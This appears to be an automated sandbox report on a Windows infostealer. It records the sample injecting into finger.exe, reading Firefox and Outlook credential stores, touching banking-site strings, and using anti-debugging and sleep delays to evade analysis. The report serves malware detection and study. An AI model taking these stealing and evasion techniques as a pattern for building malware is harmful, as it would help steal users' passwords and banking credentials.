                Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 032C5130 appears 58 times
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Code function: String function: 01515130 appears 58 times
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Code function: String function: 0155F290 appears 105 times
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Code function: String function: 014CB970 appears 283 times
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Code function: String function: 0154EA12 appears 86 times
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Code function: String function: 01527E54 appears 109 times
                Source: wSoShbuXnJ.exe, 00000005.00000002.1427654863.0000000003619000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exe, 00000005.00000002.1425910097.000000000078E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exe, 00000005.00000000.1269806018.000000000030E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamexDUy.exeL vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exe, 00000005.00000002.1430608474.0000000007350000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exe, 00000005.00000002.1427087721.000000000265C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exe, 00000005.00000002.1429535286.00000000067F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exe, 00000008.00000002.1789813470.00000000015CD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exe, 00000008.00000002.1787552487.0000000001038000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamefinger.exej% vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exe | Binary or memory string: OriginalFilenamexDUy.exeL vs wSoShbuXnJ.exe
                Source: wSoShbuXnJ.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: wSoShbuXnJ.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@10/9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wSoShbuXnJ.exe.log
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Mutant created: NULL
                Source: C:\Windows\SysWOW64\finger.exe | File created: C:\Users\user\AppData\Local\Temp\40F193-3PQ
                Source: wSoShbuXnJ.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: finger.exe, 0000000B.00000003.1974593617.0000000002DE4000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1974986374.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000002.3138314418.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1975079747.0000000002DE4000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000002.3138314418.0000000002DE4000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1974534975.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: finger.exe, 0000000B.00000003.1974593617.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE logins (origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL, date_created INTEGER NOT NULL, blacklisted_by_user INTEGER NOT NULL, scheme INTEGER NOT NULL, password_type INTEGER, times_used INTEGER, form_data BLOB, display_name VARCHAR, icon_url VARCHAR, federation_url VARCHAR, skip_zero_click INTEGER, generation_upload_status INTEGER, possible_username_pairs BLOB, id INTEGER PRIMAx;
                Source: wSoShbuXnJ.exe | Virustotal: Detection: 76%
                Source: wSoShbuXnJ.exe | ReversingLabs: Detection: 71%
                Source: unknown | Process created: C:\Users\user\Desktop\wSoShbuXnJ.exe "C:\Users\user\Desktop\wSoShbuXnJ.exe"
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Process created: C:\Users\user\Desktop\wSoShbuXnJ.exe "C:\Users\user\Desktop\wSoShbuXnJ.exe"
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe | Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                Source: C:\Windows\SysWOW64\finger.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Section loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\finger.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\finger.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: wSoShbuXnJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: wSoShbuXnJ.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: wSoShbuXnJ.exe, 00000008.00000002.1787552487.0000000001038000.00000004.00000020.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000A.00000002.3139651426.0000000001538000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RAdsmABlJtKpzt.exe, 0000000A.00000000.1710250709.0000000000D0E000.00000002.00000001.01000000.0000000C.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3137744044.0000000000D0E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: wSoShbuXnJ.exe, 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1789743504.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1786573717.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: wSoShbuXnJ.exe, wSoShbuXnJ.exe, 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1789743504.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1786573717.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: wSoShbuXnJ.exe, 00000008.00000002.1787552487.0000000001038000.00000004.00000020.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000A.00000002.3139651426.0000000001538000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 5_2_0248F028 pushad ; iretd 5_2_0248F029
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 5_2_067CEFE1 push es; iretd 5_2_067CEFE7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0041E877 push es; ret 8_2_0041E82F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00416163 pusha ; iretd 8_2_004160B8
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00403110 push eax; ret 8_2_00403112
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0040D1E1 push edx; retf 8_2_0040D1EB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0041427A push esp; ret 8_2_00414347
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00414222 push esp; ret 8_2_00414347
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0040D2E0 push edi; retf 8_2_0040D2E4
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0041435B push esp; ret 8_2_00414347
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00401D02 push ss; iretd 8_2_00401D04
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00418D36 push ds; iretd 8_2_00418D3C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00414587 push edi; ret 8_2_0041459C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00414593 push edi; ret 8_2_0041459C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00416626 push eax; ret 8_2_004166A4
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00415ED3 pusha ; iretd 8_2_004160B8
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0041177F pushfd ; ret 8_2_00411786
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0041E7E5 push es; ret 8_2_0041E82F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00423783 push edi; iretd 8_2_0042378E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D09AD push ecx; mov dword ptr [esp], ecx8_2_014D09B6
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014A135E push eax; iretd 8_2_014A1369
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0325225F pushad ; ret 11_2_032527F9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032527FA pushad ; ret 11_2_032527F9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_032809AD push ecx; mov dword ptr [esp], ecx11_2_032809B6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0325283D push eax; iretd 11_2_03252858
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_03251368 push eax; iretd 11_2_03251369
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_02950670 push edi; iretd 11_2_0295067B
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0293E66C pushfd ; ret 11_2_0293E673
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0295066A push edi; iretd 11_2_0295067B
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0294C47D push cs; ret 11_2_0294C4A1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_02942DC0 pusha ; iretd 11_2_02942FA5
                Source: wSoShbuXnJ.exeStatic PE information: section name: .text entropy: 7.737457250389855
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: wSoShbuXnJ.exe PID: 7440, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FF8418CDA44
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeMemory allocated: C70000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeMemory allocated: 2610000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeMemory allocated: 4610000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeMemory allocated: 8C80000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeMemory allocated: 69C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeMemory allocated: 9C80000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeMemory allocated: 7520000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0151096E rdtsc 8_2_0151096E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\finger.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe TID: 7476Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\finger.exe TID: 5908Thread sleep count: 38 > 30
                Source: C:\Windows\SysWOW64\finger.exe TID: 5908Thread sleep time: -76000s >= -30000s
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe TID: 6252Thread sleep time: -55000s >= -30000s
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe TID: 6252Thread sleep time: -31500s >= -30000s
                Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0294C7B0 FindFirstFileW,FindNextFileW,FindClose,11_2_0294C7B0
                Source: 40F193-3PQ.11.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: 40F193-3PQ.11.drBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: 40F193-3PQ.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: 40F193-3PQ.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: 40F193-3PQ.11.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: 40F193-3PQ.11.drBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: 40F193-3PQ.11.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: 40F193-3PQ.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: finger.exe, 0000000B.00000002.3143595877.0000000007D23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,1169650
                Source: 40F193-3PQ.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: wSoShbuXnJ.exe, 00000005.00000002.1429535286.00000000067F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: cZnoVmci1j
                Source: 40F193-3PQ.11.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: 40F193-3PQ.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: finger.exe, 0000000B.00000002.3143595877.0000000007D23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,116965x~t
                Source: finger.exe, 0000000B.00000002.3143595877.0000000007D23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413G~[
                Source: 40F193-3PQ.11.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: finger.exe, 0000000B.00000002.3143595877.0000000007D23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11
                Source: finger.exe, 0000000B.00000002.3143595877.0000000007D23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,1169650141
                Source: finger.exe, 0000000B.00000002.3143595877.0000000007D23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive userers - GDCDYNVMware20,11696501413p
                Source: 40F193-3PQ.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: 40F193-3PQ.11.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: finger.exe, 0000000B.00000002.3138314418.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2082941547.0000020532DBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 40F193-3PQ.11.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: finger.exe, 0000000B.00000002.3143595877.0000000007D23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs - EU East & CentralVMware20,11696501413
                Source: 40F193-3PQ.11.drBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: 40F193-3PQ.11.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: RAdsmABlJtKpzt.exe, 0000000C.00000002.3139849236.00000000013EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
                Source: 40F193-3PQ.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: 40F193-3PQ.11.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: 40F193-3PQ.11.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: 40F193-3PQ.11.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: 40F193-3PQ.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: 40F193-3PQ.11.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: 40F193-3PQ.11.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: 40F193-3PQ.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: 40F193-3PQ.11.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: 40F193-3PQ.11.drBinary or memory string: global block list test formVMware20,11696501413
                Source: 40F193-3PQ.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: 40F193-3PQ.11.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: 40F193-3PQ.11.drBinary or memory string: discord.comVMware20,11696501413f
                Source: finger.exe, 0000000B.00000002.3143595877.0000000007D23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696
                Source: 40F193-3PQ.11.drBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\finger.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_00417813 LdrLoadDll,8_2_00417813
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01568158 mov eax, dword ptr fs:[00000030h]8_2_01568158
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01564144 mov eax, dword ptr fs:[00000030h]8_2_01564144
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01564144 mov ecx, dword ptr fs:[00000030h]8_2_01564144
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D6154 mov eax, dword ptr fs:[00000030h]8_2_014D6154
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CC156 mov eax, dword ptr fs:[00000030h]8_2_014CC156
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4164 mov eax, dword ptr fs:[00000030h]8_2_015A4164
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01590115 mov eax, dword ptr fs:[00000030h]8_2_01590115
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157A118 mov ecx, dword ptr fs:[00000030h]8_2_0157A118
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157A118 mov eax, dword ptr fs:[00000030h]8_2_0157A118
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E10E mov eax, dword ptr fs:[00000030h]8_2_0157E10E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157E10E mov ecx, dword ptr fs:[00000030h]8_2_0157E10E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01500124 mov eax, dword ptr fs:[00000030h]8_2_01500124
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154E1D0 mov eax, dword ptr fs:[00000030h]8_2_0154E1D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154E1D0 mov ecx, dword ptr fs:[00000030h]8_2_0154E1D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015961C3 mov eax, dword ptr fs:[00000030h]8_2_015961C3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015001F8 mov eax, dword ptr fs:[00000030h]8_2_015001F8
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A61E5 mov eax, dword ptr fs:[00000030h]8_2_015A61E5
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155019F mov eax, dword ptr fs:[00000030h]8_2_0155019F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0158C188 mov eax, dword ptr fs:[00000030h]8_2_0158C188
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01510185 mov eax, dword ptr fs:[00000030h]8_2_01510185
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01574180 mov eax, dword ptr fs:[00000030h]8_2_01574180
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CA197 mov eax, dword ptr fs:[00000030h]8_2_014CA197
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01556050 mov eax, dword ptr fs:[00000030h]8_2_01556050
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D2050 mov eax, dword ptr fs:[00000030h]8_2_014D2050
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FC073 mov eax, dword ptr fs:[00000030h]8_2_014FC073
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01554000 mov ecx, dword ptr fs:[00000030h]8_2_01554000
